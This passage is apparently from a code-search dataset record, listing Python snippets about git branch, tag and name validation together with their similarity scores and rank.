RE_COMP_NAME.match(comp_name):\n res.append(f\"Invalid component name: {comp_name}\")\n\n for branch_name, branch in sorted(comp.branches.items()):\n check_branch(comp_name, branch_name, branch)", "def is_subtag(tag_name, subtag_name, user_path, current_user) -> bool:\n user = current_user[0]\n subtag_list = os.listdir((user_path + '\\\\' + user + '\\\\' + tag_name).encode('unicode_escape'))\n temp = list(map(bytes.decode, subtag_list))\n\n if subtag_name + '.txt' in temp:\n return True\n else:\n return False", "def _is_desired_tag(self, tag):\n if self._tags is None:\n return True\n\n if self._ignore_namespace:\n for desired_tag in self._tags:\n if tag.localname == desired_tag.localname:\n return True\n else:\n for desired_tag in self._tags:\n if tag == desired_tag:\n return True\n\n return False", "def has_name(self, name: str) -> bool:\n return name in self.child_tags", "def is_tag(tag_name, user_path, current_user) -> bool:\n user = current_user[0]\n tag_list = os.listdir((user_path + '\\\\' + user).encode('unicode_escape'))\n temp = list(map(bytes.decode, tag_list))\n if tag_name in temp:\n return True\n else:\n return False", "def verify_tag(tag):\n command = [\"git\", \"tag\", \"--points-at\"]\n with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:\n tag_str = proc.stdout.readline()\n return tag_str.decode(\"utf-8\").rstrip() == tag", "def test_bookmark_tag_complete(self):\r\n self._get_good_request(second_bmark=True)\r\n\r\n res = self.testapp.get(\r\n '/api/v1/admin/tags/complete',\r\n params={\r\n 'tag': 'py',\r\n 'api_key': API_KEY},\r\n status=200)\r\n\r\n self.assertTrue(\r\n 'python' in res.body,\r\n \"Should have 
python as a tag completion: \" + res.body)\r\n\r\n # we shouldn't get python as an option if we supply bookmarks as the\r\n # current tag. No bookmarks have both bookmarks & python as tags\r\n res = self.testapp.get(\r\n '/api/v1/admin/tags/complete',\r\n params={\r\n 'tag': u'py',\r\n 'current': u'bookmarks',\r\n 'api_key': API_KEY\r\n },\r\n status=200)\r\n\r\n self.assertTrue(\r\n 'python' not in res.body,\r\n \"Should not have python as a tag completion: \" + res.body)\r\n self._check_cors_headers(res)", "def is_valid_git_refname(refname):\r\n if len(refname) == 0:\r\n return False\r\n\r\n # git imposes a few requirements to accept a string as a\r\n # refname/branch-name\r\n\r\n # They can include slash / for hierarchical (directory) grouping, but no\r\n # slash-separated component can begin with a dot . or end with the sequence\r\n # .lock\r\n if (len([True for element in refname.split('/')\r\n if element.startswith('.') or element.endswith('.lock')]) != 0):\r\n return False\r\n\r\n # They cannot have two consecutive dots .. anywhere\r\n if '..' in refname:\r\n return False\r\n\r\n # They cannot have ASCII control characters (i.e. bytes whose values are\r\n # lower than \\040, or \\177 DEL), space, tilde, caret ^, or colon : anywhere\r\n if len([True for refname_char in refname if ord(refname_char) < 40 or\r\n ord(refname_char) == 177]) != 0:\r\n return False\r\n if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:\r\n return False\r\n\r\n # They cannot have question-mark ?, asterisk *, or open bracket [ anywhere\r\n if '?' in refname or '*' in refname or '[' in refname:\r\n return False\r\n\r\n # They cannot begin or end with a slash / or contain multiple consecutive\r\n # slashes\r\n if refname.startswith('/') or refname.endswith('/') or '//' in refname:\r\n return False\r\n\r\n # They cannot end with a dot ..\r\n if refname.endswith('.'):\r\n return False\r\n\r\n # They cannot contain a sequence @{\r\n if '@{' in refname:\r\n return False\r\n\r\n # They cannot contain a \\\r\n if '\\\\' in refname:\r\n return False\r\n\r\n return True", "def branch_exists(branch):\n\n try:\n git('show-ref', branch)\n return True\n except subprocess.CalledProcessError:\n return False", "def is_remote_reserve_branch_present(repo):\n reserve_name = phlgitu_ref.Name(_RESERVE_BRANCH_FQ_NAME)\n remote_ref_names = repo(\"ls-remote\").split()[1::2]\n return reserve_name.fq in remote_ref_names", "def match(self, name, tags):\n name, tags = self.get_compiled(name, tags)\n \n def index_of_letter(l):\n return ord(l) - ord('a')\n \n true_val, false_val = name\n \n if true_val:\n return index_of_letter(true_val) in tags\n else:\n return index_of_letter(false_val) not in tags", "def bonenamematch(name1, name2):\n if name1 == name2:\n return True\n if name1.startswith(\"Bip01 L \"):\n name1 = \"Bip01 \" + name1[8:] + \".L\"\n elif name1.startswith(\"Bip01 R \"):\n name1 = \"Bip01 \" + name1[8:] + \".R\"\n if name2.startswith(\"Bip01 L \"):\n name2 = \"Bip01 \" + name2[8:] + \".L\"\n elif name2.startswith(\"Bip01 R \"):\n name2 = \"Bip01 \" + name2[8:] + \".R\"\n if name1 == name2:\n return True\n return False", "def match(self, name, tags):\n S, tags = self.get_compiled(name, tags)\n return bool(S & tags)", "def is_linguistic_tag(tag):\r\n if tag.startswith(\"&\"):\r\n return True\r\n if any(x in tag for x in [\"<abbr>\", \"<abbr \", \"</abbr>\"]):\r\n return True\r\n return False", "def git_checkout_branch(name):\n\n if subprocess.call([\"git\", \"diff\", \"--quiet\", \"HEAD\"]) != 0:\n raise 
Exception(\"Dirty working tree; not checking out %s\" % name)\n\n if subprocess.call([\"git\", \"checkout\", name]) != 0:\n raise Exception(\"Could not checkout %s\" % name)", "def local_branch_exists(self, branch):\n return branch in self.repo.branches", "def is_complete(self, A, B):\n return all(self.is_edge(v, w) for v in A for w in B)", "def _check_branch(opt, params):\n\n # Check the current branch and hash\n _get_branch(opt)\n\n if params.git_branch != opt.git_branch or params.git_hash != opt.git_hash:\n msg = 'You are not on the right branch or commit. Please run the following in the repository: \\n'\n msg += f'git checkout {params.git_branch}\\n'\n msg += f'git revert {params.git_hash}'\n sys.exit(msg)", "def mac_pool_exists(handle, name, assignment_order=None,\r\n r_from=None, to=None, descr=None, parent_dn=\"org-root\"):\r\n dn = parent_dn + '/mac-pool-' + name\r\n mo = handle.query_dn(dn)\r\n if mo:\r\n if ((assignment_order and mo.assignment_order != assignment_order) and\r\n (r_from and mo.r_from != r_from) and\r\n (to and mo.to != to) and\r\n (descr and mo.descr != descr)):\r\n return False\r\n return True\r\n return False", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def check_name(self, name: str):\n if name[0] == \"/\" or self.check_end_streaming(name):\n return True\n else:\n return False" ]
[ "0.6780454", "0.67798984", "0.61064994", "0.555332", "0.54905283", "0.5410261", "0.5404235", "0.5332533", "0.52437496", "0.52371407", "0.5203334", "0.5191445", "0.5187049", "0.5181029", "0.5169189", "0.51587147", "0.51385343", "0.5123286", "0.50983757", "0.50803226", "0.5074915", "0.5070328", "0.5064637", "0.5060143", "0.5053163", "0.5048199", "0.500991", "0.5005835", "0.4999374", "0.4996595" ]
0.79997444
0
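`is_nametag_reachable` expects `branches` to map arbitrary keys to objects exposing `name` and `next_nametags` attributes; the wrapping class is not shown in the record, so this sketch substitutes `SimpleNamespace` for it:

```python
from types import SimpleNamespace as B  # hypothetical stand-in for the real branch class

branches = {
    "start": B(name="start", next_nametags=["left", "right"]),
    "left":  B(name="left",  next_nametags=["end"]),
    "right": B(name="right", next_nametags=["end"]),
    "end":   B(name="end",   next_nametags=[]),
}

# is_nametag_reachable("left", branches)  -> True   ("start" lists it as a next nametag)
# is_nametag_reachable("start", branches) -> False  (no branch points back to it)
```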
Checks whether the given nametag is indeed labelling a branch.
def branch_exists(nametag, branches): for branch in branches: if branches[branch].name == nametag: return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_nametag_reachable(nametag, branches):\n for branch in branches:\n for next_nametag in branches[branch].next_nametags:\n if next_nametag == nametag:\n return True\n return False", "def _is_branch(self, reference_name):\n return reference_name.startswith(\"refs/heads/\") or reference_name.startswith(\n \"refs/remotes/\"\n )", "def valid_branches(branches):\n\n # for every branch in the list\n for branch in branches:\n\n # make sure it is either reachable or has the special tag \"start\"\n if branches[branch].name != \"start\" and not is_nametag_reachable(branches[branch].name, branches):\n return False\n\n # make sure all ending tags refer to existing branches\n for nametag in branches[branch].next_nametags:\n if not branch_exists(nametag, branches):\n return False\n\n return True", "def is_branch(wit_path, branch):\n\n branches = _get_references_data(wit_path)\n del branches['HEAD']\n return branch in branches.keys()", "def has_branch(self, branch):\n if self.branch == branch:\n return True\n return False", "def _is_label(self) -> bool:\n return self.lines[self.counter].startswith(\"(\") and self.lines[\n self.counter\n ].endswith(\")\")", "def _is_label(self, words):\n if words[0] == 'label':\n if len(words) != 2:\n raise SyntaxError(\"File line {}: Invalid number of arguments for C_LABEL command.\".format(self._file_line))\n return True\n else:\n return False", "def is_label(self, label: str) -> bool:\n return label in self.is_label_of", "def branch_exists(branch):\n\n try:\n git('show-ref', branch)\n return True\n except subprocess.CalledProcessError:\n return False", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def has_name(self, name: str) -> bool:\n return name in self.child_tags", "def is_branch(self, inst_type):\n return inst_type in CONDITIONAL_BRANCH_TYPES or \\\n inst_type in UNCONDITIONAL_BRANCH_TYPES", "def branch_exists(branch_name, local_only=False, directory=None):\n for branch in get_branches(local_only, directory):\n if branch.startswith('remotes/'):\n branch = branch.split('/')\n if len(branch) > 2:\n branch = '/'.join(branch[2:])\n if branch_name == branch:\n return True\n else:\n if branch_name == branch:\n return True\n return False", "def local_branch_exists(self, branch):\n return branch in self.repo.branches", "def test_branch_name_get(repository: Repository) -> None:\n branch = repository.branch(repository.head.name)\n assert repository.head.name == branch.name", "def isLeaf(self, node_name):\n if self.tree.node[node_name]['c'] != '':\n return True\n else:\n return False", "def _is_current_branch(self, branch_name, current_branch_name):\n return branch_name == current_branch_name", "def is_valid_label(self, label):\n try:\n self.validate_label(label)\n return True\n except etal.LabelsSchemaError:\n return False", "def branch_exists(repo, branch, remote=False):\n ref = 'refs/remotes/origin/' + branch if remote else 'refs/heads/' + branch\n return subprocess.call(['git', 'show-ref', '-q', '--verify', ref],\n cwd=repo) == 0", "def master_branch(branch_name):\n\n if branch_name in MASTER_BRANCHES:\n return True\n\n return False", "def check_for_branch_op(op_info: ModuleIdentifierOpInfo):\n\n op = conn_graph.get_all_ops()[op_info.module_name]\n return_bool = True\n product = op.output\n if \"branch\" not in product.name:\n 
logger.error(\"branch not in product name\")\n return_bool = False\n if len(product.consumers) > 1:\n logger.error(\"branch op is not parent op's only consumer\")\n return_bool = False\n branch_op = product.consumers[0]\n if branch_op.type != \"branch\":\n logger.error(\"parent op's child op is not of type branch\")\n return_bool = False\n branch_product = branch_op.output\n if \"multiple_ops\" not in branch_product.name:\n logger.error(\"multiple_ops not in branch op's product's name\")\n return_bool = False\n if len(branch_product.consumers) <= 1:\n logger.error(\"branch op's product has one or fewer consumers\")\n return_bool = False\n for consumer in branch_product.consumers:\n for input_product in consumer.inputs:\n if input_product.producer == op:\n logger.error(\"parent op is still one of child op's inputs (as opposed to branch op)\")\n return_bool = False\n return return_bool", "def has_label(self, label):\n return label == self.label", "def is_valid_git_refname(refname):\r\n if len(refname) == 0:\r\n return False\r\n\r\n # git imposes a few requirements to accept a string as a\r\n # refname/branch-name\r\n\r\n # They can include slash / for hierarchical (directory) grouping, but no\r\n # slash-separated component can begin with a dot . or end with the sequence\r\n # .lock\r\n if (len([True for element in refname.split('/')\r\n if element.startswith('.') or element.endswith('.lock')]) != 0):\r\n return False\r\n\r\n # They cannot have two consecutive dots .. anywhere\r\n if '..' in refname:\r\n return False\r\n\r\n # They cannot have ASCII control characters (i.e. bytes whose values are\r\n # lower than \\040, or \\177 DEL), space, tilde, caret ^, or colon : anywhere\r\n if len([True for refname_char in refname if ord(refname_char) < 40 or\r\n ord(refname_char) == 177]) != 0:\r\n return False\r\n if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:\r\n return False\r\n\r\n # They cannot have question-mark ?, asterisk *, or open bracket [ anywhere\r\n if '?' 
in refname or '*' in refname or '[' in refname:\r\n return False\r\n\r\n # They cannot begin or end with a slash / or contain multiple consecutive\r\n # slashes\r\n if refname.startswith('/') or refname.endswith('/') or '//' in refname:\r\n return False\r\n\r\n # They cannot end with a dot ..\r\n if refname.endswith('.'):\r\n return False\r\n\r\n # They cannot contain a sequence @{\r\n if '@{' in refname:\r\n return False\r\n\r\n # They cannot contain a \\\r\n if '\\\\' in refname:\r\n return False\r\n\r\n return True", "def verify_tag(tag):\n command = [\"git\", \"tag\", \"--points-at\"]\n with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:\n tag_str = proc.stdout.readline()\n return tag_str.decode(\"utf-8\").rstrip() == tag", "def has_label(self, label):\n return label in self.get_labels()", "def test_heads_create_new_branch_name(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert \"branch\" == branch.name", "def is_valid_compound_name(name: str) -> bool:\n return n2s.has_smiles(name)", "def verify_branch(path, expected_branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch is %s:\" % expected_branch)\n branch = run_in_component(path, ['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\n branch = branch.strip()\n\n if branch == expected_branch:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You must be on branch %s to release, you are on %s\" % (expected_branch, branch))", "def has_label(self, label):\n\t\treturn label in self.labels", "def has_label(self, label):\n\t\t\treturn label in self.labels" ]
[ "0.715576", "0.7042534", "0.6742809", "0.67223674", "0.6595517", "0.6064686", "0.6029496", "0.6010573", "0.59576434", "0.5933389", "0.58508664", "0.58427274", "0.584109", "0.582408", "0.58061534", "0.5799144", "0.5777416", "0.5758434", "0.5737931", "0.5732576", "0.5721581", "0.5707645", "0.5703956", "0.56670606", "0.5656595", "0.56549215", "0.56361145", "0.5628567", "0.5604564", "0.5591245" ]
0.7622634
0
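Note that `branch_exists` compares against each branch's `name` attribute rather than the dictionary keys, so it stays correct even when the mapping is keyed by something other than the nametag. A hedged one-pass equivalent, again using `SimpleNamespace` as a stand-in for the unshown branch class:

```python
from types import SimpleNamespace as B  # hypothetical stand-in for the real branch class

def branch_exists_fast(nametag, branches):
    # generator-expression equivalent of the explicit loop in the record above
    return any(b.name == nametag for b in branches.values())

branches = {1: B(name="start"), 2: B(name="checkpoint")}  # keys need not equal names
assert branch_exists_fast("checkpoint", branches)
assert not branch_exists_fast("missing", branches)
```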
Checks that the given branches are valid (each individual branch is assumed to be valid on its own). The idea here is to make sure that every ending nametag leads to an existing branch and that every branch is reachable.
def valid_branches(branches): # for every branch in the list for branch in branches: # make sure it is either reachable or has the special tag "start" if branches[branch].name != "start" and not is_nametag_reachable(branches[branch].name, branches): return False # make sure all ending tags refer to existing branches for nametag in branches[branch].next_nametags: if not branch_exists(nametag, branches): return False return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _check_branches(num_branches, num_blocks, in_channels, num_channels):\n if num_branches != len(num_blocks):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_BLOCKS({len(num_blocks)})'\n raise ValueError(error_msg)\n if num_branches != len(num_channels):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_CHANNELS({len(num_channels)})'\n raise ValueError(error_msg)\n if num_branches != len(in_channels):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_INCHANNELS({len(in_channels)})'\n raise ValueError(error_msg)", "def _check_branches(self, num_branches, in_channels):\n if num_branches != len(in_channels):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_INCHANNELS({len(in_channels)})'\n raise ValueError(error_msg)", "def validate(cfg: defs.Config) -> List[str]: # noqa: C901\n res: List[str] = []\n\n def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n \"\"\"Validate versions within a single branch.\"\"\"\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")\n\n def check_component(comp_name: str, comp: defs.Component) -> None:\n \"\"\"Validate the definition of a single component.\"\"\"\n if not RE_COMP_NAME.match(comp_name):\n res.append(f\"Invalid component name: {comp_name}\")\n\n for branch_name, branch in sorted(comp.branches.items()):\n check_branch(comp_name, branch_name, branch)\n\n for comp_name, comp in sorted(cfg.all_components.components.items()):\n check_component(comp_name, comp)\n\n return res", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in 
branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def branch_exists(nametag, branches):\n for branch in branches:\n if branches[branch].name == nametag:\n return True\n return False", "def validate_branch_config(branch_cfg, branch, n):\n res = False\n if len(branch) == 4:\n if \"double\" in branch_cfg:\n diff1 = branch[0]-branch[1]\n diff3 = branch[2]-branch[3]\n diff2 = branch[1]%n-branch[2]%n\n diff_adj_clk = [-3, 1]\n diff_adj_clk_ctr = [-e for e in diff_adj_clk]\n diff_opp = [2, -2]\n if \"adjacent\" and \"clockwise\" in branch_cfg and diff1 == diff3 == 0 and diff2 in diff_adj_clk:\n res = True\n elif \"adjacent\" and \"counter clockwise\" in branch_cfg and diff1 == diff3 == 0 and diff2 in diff_adj_clk_ctr:\n res = True\n elif \"opposite\" in branch_cfg and diff1 == diff3 == 0 and diff2 in diff_opp:\n res = True\n elif \"single\" in branch_cfg:\n res = True\n elif len(branch) == 2:\n res = True\n return res", "def validate_branch_ops(conn_graph: ConnectedGraph):\n\n def check_for_branch_op(op_info: ModuleIdentifierOpInfo):\n \"\"\"\n Look inside conn_graph ops and products for branch ops, and validate connections to parent and child ops\n \"\"\"\n\n op = conn_graph.get_all_ops()[op_info.module_name]\n return_bool = True\n product = op.output\n if \"branch\" not in product.name:\n logger.error(\"branch not in product name\")\n return_bool = False\n if len(product.consumers) > 1:\n logger.error(\"branch op is not parent op's only consumer\")\n return_bool = False\n branch_op = product.consumers[0]\n if branch_op.type != \"branch\":\n logger.error(\"parent op's child op is not of type branch\")\n return_bool = False\n branch_product = branch_op.output\n if \"multiple_ops\" not in branch_product.name:\n logger.error(\"multiple_ops not in branch op's product's name\")\n return_bool = False\n if len(branch_product.consumers) <= 1:\n logger.error(\"branch op's product has one or fewer consumers\")\n return_bool = False\n for consumer in branch_product.consumers:\n for input_product in consumer.inputs:\n if input_product.producer == op:\n logger.error(\"parent op is still one of child op's inputs (as opposed to branch op)\")\n return_bool = False\n return return_bool\n\n # pylint: disable=protected-access\n module_identifier = StructureModuleIdentifier(conn_graph.graph, conn_graph._starting_op_names,\n conn_graph._valid_ops)\n num_branches_found = 0\n for tf_op in conn_graph.graph.get_operations():\n # Ignore ops which were not found in the initial depth first search\n if tf_op not in module_identifier.processed_ops:\n continue\n\n found_branch = False\n for output_tensor in tf_op.outputs:\n if len(output_tensor.consumers()) 
> 1:\n # Potential branch op. Check if children go to separate modules\n child_module_set = set()\n for consumer_op in output_tensor.consumers():\n if consumer_op in module_identifier._valid_ops:\n child_module_info = module_identifier.get_op_info(consumer_op)\n child_module_set.add(child_module_info.module_name)\n\n # If children go to separate modules, this should be a branch op\n if len(child_module_set) > 1:\n found_branch = True\n break\n\n if found_branch:\n num_branches_found += 1\n tf_op_info = module_identifier.get_op_info(tf_op)\n if not check_for_branch_op(tf_op_info):\n return False\n\n logger.info(\"Found %s branches\", num_branches_found)\n return True", "def is_nametag_reachable(nametag, branches):\n for branch in branches:\n for next_nametag in branches[branch].next_nametags:\n if next_nametag == nametag:\n return True\n return False", "def ensure_tracking_branches(args):\n man = load_manifest()\n for (name, project) in man.projects.iteritems():\n repo = GitRepo(workdir_for_project(project))\n branch_missing = repo.command(\n [\"rev-parse\", \"--verify\", \"-q\", project.refspec],\n capture_stdout=True)\n \n if branch_missing:\n logging.warn(\"Branch %s does not exist in project %s. checking out.\" %\n (project.refspec, name))\n repo.command([\"branch\", \"--track\",\n project.tracking_branch, project.remote_refspec])", "def validate_empty_branches(nanowire, min_free_branch, msg):\n score = 0\n valid = False\n\n for intersection in nanowire:\n free_b = 0\n for branch in intersection:\n min_free_pos = len(branch)\n free_p = 0\n for tup in branch:\n if not isinstance(tup, dict):\n continue\n if list(tup.values())[0] == 0:\n free_p += 1\n else:\n free_p = 0\n if free_p>=min_free_pos:\n free_b += 1\n if free_b>=min_free_branch:\n valid = True\n\n if valid:\n score += 1\n # if score==0:\n # raise exception.NoEmptyBranchException(msg)\n return score", "def _validate_branch_args(self) -> None:\n lk = set(self.branch_losses.keys())\n dk = set(self.model._get_inner_keys(self.model.heads))\n has_same_keys = lk == dk\n\n mk = None\n if self.branch_metrics is not None:\n mk = set(self.branch_metrics.keys())\n has_same_keys = dk == lk == mk\n\n ek = None\n if self.branch_loss_params is not None:\n ek = set(self.branch_loss_params.keys())\n has_same_keys = dk == lk == mk == ek\n\n if not has_same_keys:\n raise ValueError(\n \"Got mismatching keys for branch dict args. \"\n f\"Branch losses: {lk}. \"\n f\"Branch loss params: {ek}. \"\n f\"Decoder branches: {dk}. \"\n f\"Metrics: {mk}. 
\"\n f\"(`metrics`, and `branch_loss_params` can be None)\"\n )", "def test_is_valid_git_refname(self):\n # valid branchnames\n self.assertTrue(is_valid_git_refname('master'))\n self.assertTrue(is_valid_git_refname('debuggatron_2000'))\n self.assertTrue(is_valid_git_refname('refname/bar'))\n self.assertTrue(is_valid_git_refname('ref.nameslu/_eggs_/spam'))\n self.assertTrue(is_valid_git_refname('valid{0}char'.format(\n unichr(40))))\n self.assertTrue(is_valid_git_refname('master@head'))\n self.assertTrue(is_valid_git_refname('bar{thing}foo'))\n\n # case happening with git < 1.6.6\n self.assertFalse(is_valid_git_refname(\n '--abbrev-ref\\nbaa350d7b7063d585ca293fc16ef15e0765dc9ee'))\n\n # different invalid refnames, for a description of each group see the\n # man page of git check-ref-format\n self.assertFalse(is_valid_git_refname('bar/.spam/eggs'))\n self.assertFalse(is_valid_git_refname('bar.lock/spam/eggs'))\n self.assertFalse(is_valid_git_refname('bar.lock'))\n self.assertFalse(is_valid_git_refname('.foobar'))\n\n self.assertFalse(is_valid_git_refname('ref..name'))\n\n self.assertFalse(is_valid_git_refname(u'invalid{0}char'.format(\n unichr(177))))\n self.assertFalse(is_valid_git_refname('invalid{0}char'.format(\n unichr(39))))\n self.assertFalse(is_valid_git_refname('ref~name/bar'))\n self.assertFalse(is_valid_git_refname('refname spam'))\n self.assertFalse(is_valid_git_refname('bar/foo/eggs~spam'))\n self.assertFalse(is_valid_git_refname('bar:_spam_'))\n self.assertFalse(is_valid_git_refname('eggtastic^2'))\n\n self.assertFalse(is_valid_git_refname('areyourandy?'))\n self.assertFalse(is_valid_git_refname('bar/*/spam'))\n self.assertFalse(is_valid_git_refname('bar[spam]/eggs'))\n\n self.assertFalse(is_valid_git_refname('/barfooeggs'))\n self.assertFalse(is_valid_git_refname('barfooeggs/'))\n self.assertFalse(is_valid_git_refname('bar/foo//////eggs'))\n\n self.assertFalse(is_valid_git_refname('dotEnding.'))\n\n self.assertFalse(is_valid_git_refname('@{branch'))\n\n self.assertFalse(is_valid_git_refname('contains\\\\slash'))\n\n self.assertFalse(is_valid_git_refname('$newbranch'))", "def _check_branch(opt, params):\n\n # Check the current branch and hash\n _get_branch(opt)\n\n if params.git_branch != opt.git_branch or params.git_hash != opt.git_hash:\n msg = 'You are not on the right branch or commit. 
Please run the following in the repository: \\n'\n msg += f'git checkout {params.git_branch}\\n'\n msg += f'git revert {params.git_hash}'\n sys.exit(msg)", "def test_is_valid_git_refname(self):\r\n # valid branchnames\r\n self.assertTrue(is_valid_git_refname('master'))\r\n self.assertTrue(is_valid_git_refname('debuggatron_2000'))\r\n self.assertTrue(is_valid_git_refname('refname/bar'))\r\n self.assertTrue(is_valid_git_refname('ref.nameslu/_eggs_/spam'))\r\n self.assertTrue(is_valid_git_refname('valid{0}char'.format(\r\n unichr(40))))\r\n self.assertTrue(is_valid_git_refname('master@head'))\r\n self.assertTrue(is_valid_git_refname('bar{thing}foo'))\r\n\r\n # case happening with git < 1.6.6\r\n self.assertFalse(is_valid_git_refname(\r\n '--abbrev-ref\\nbaa350d7b7063d585ca293fc16ef15e0765dc9ee'))\r\n\r\n # different invalid refnames, for a description of each group see the\r\n # man page of git check-ref-format\r\n self.assertFalse(is_valid_git_refname('bar/.spam/eggs'))\r\n self.assertFalse(is_valid_git_refname('bar.lock/spam/eggs'))\r\n self.assertFalse(is_valid_git_refname('bar.lock'))\r\n self.assertFalse(is_valid_git_refname('.foobar'))\r\n\r\n self.assertFalse(is_valid_git_refname('ref..name'))\r\n\r\n self.assertFalse(is_valid_git_refname(u'invalid{0}char'.format(\r\n unichr(177))))\r\n self.assertFalse(is_valid_git_refname('invalid{0}char'.format(\r\n unichr(39))))\r\n self.assertFalse(is_valid_git_refname('ref~name/bar'))\r\n self.assertFalse(is_valid_git_refname('refname spam'))\r\n self.assertFalse(is_valid_git_refname('bar/foo/eggs~spam'))\r\n self.assertFalse(is_valid_git_refname('bar:_spam_'))\r\n self.assertFalse(is_valid_git_refname('eggtastic^2'))\r\n\r\n self.assertFalse(is_valid_git_refname('areyourandy?'))\r\n self.assertFalse(is_valid_git_refname('bar/*/spam'))\r\n self.assertFalse(is_valid_git_refname('bar[spam]/eggs'))\r\n\r\n self.assertFalse(is_valid_git_refname('/barfooeggs'))\r\n self.assertFalse(is_valid_git_refname('barfooeggs/'))\r\n self.assertFalse(is_valid_git_refname('bar/foo//////eggs'))\r\n\r\n self.assertFalse(is_valid_git_refname('dotEnding.'))\r\n\r\n self.assertFalse(is_valid_git_refname('@{branch'))\r\n\r\n self.assertFalse(is_valid_git_refname('contains\\\\slash'))\r\n\r\n self.assertFalse(is_valid_git_refname('$newbranch'))", "def protect_pr_branch_with_tests_if_any_exist(org: Organization, repo: Repository,\n branches: Dict[str, Branch]) -> List[Change[str]]:\n def execute_test_protection(change: Change[str], branch: Branch, existing_checks: Set[str],\n known_status_checks: Set[str], known_checkruns: Set[str]) -> Change[str]:\n\n all_known_checks = known_status_checks | known_checkruns # For convenience later to treat them as a single set\n\n print_debug(\"[%s] Changing status checks on branch '%s' to [%s]\" %\n 